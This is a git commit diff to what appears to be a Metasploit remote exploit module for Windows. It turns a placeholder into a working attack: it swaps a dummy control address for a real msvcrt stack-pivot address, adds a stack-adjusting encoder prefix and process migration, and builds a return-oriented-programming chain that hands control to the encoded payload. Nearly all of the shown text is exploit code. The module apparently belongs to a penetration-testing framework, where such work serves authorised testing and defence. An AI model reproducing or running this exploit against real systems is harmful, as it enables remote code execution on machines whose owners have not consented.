Working version

bug/bundler_fix
sinn3r 2013-11-22 19:14:56 -06:00
parent c8fd761c53
commit eddedd4746
1 changed files with 15 additions and 6 deletions

View File

@ -69,11 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Payload' =>
{
'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff", # add esp, -80000; popad; popfd
'StackAdjustment' => -3500,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "process"
'ExitFunction' => "process",
'PrependMigrate' => true
},
'Platform' => 'win',
'Targets' =>
@ -134,7 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Gain control of the call [eax+50h] instruction
buf[0x4874, 4] = [0x41424344-0x50].pack('V')
# XCHG EAX, ESP; RETN msvcrt
buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
buf
end
@ -147,7 +151,9 @@ class Metasploit3 < Msf::Exploit::Remote
# Target address (200F0700):
# 0:000> dd 200f06fc L4
# 200f06fc ffffffff 36643ab8 d9c0d946 5af42474
p = generate_rop_payload('msvcrt','',{'target'=>'xp'})
p = ''
p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt
p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
p << payload.encoded
block = p
block << "B" * (1024 - p.length)
@ -227,7 +233,10 @@ class Metasploit3 < Msf::Exploit::Remote
mscd << [0x00000002].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0xfffffffe].pack('V')
mscd << [0xffffffff].pack('V') * 52
mscd << [0xffffffff].pack('V') * 32 #52
mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
mscd << [0xffffffff].pack('V') * 18
mscd << @rop_payload
mscd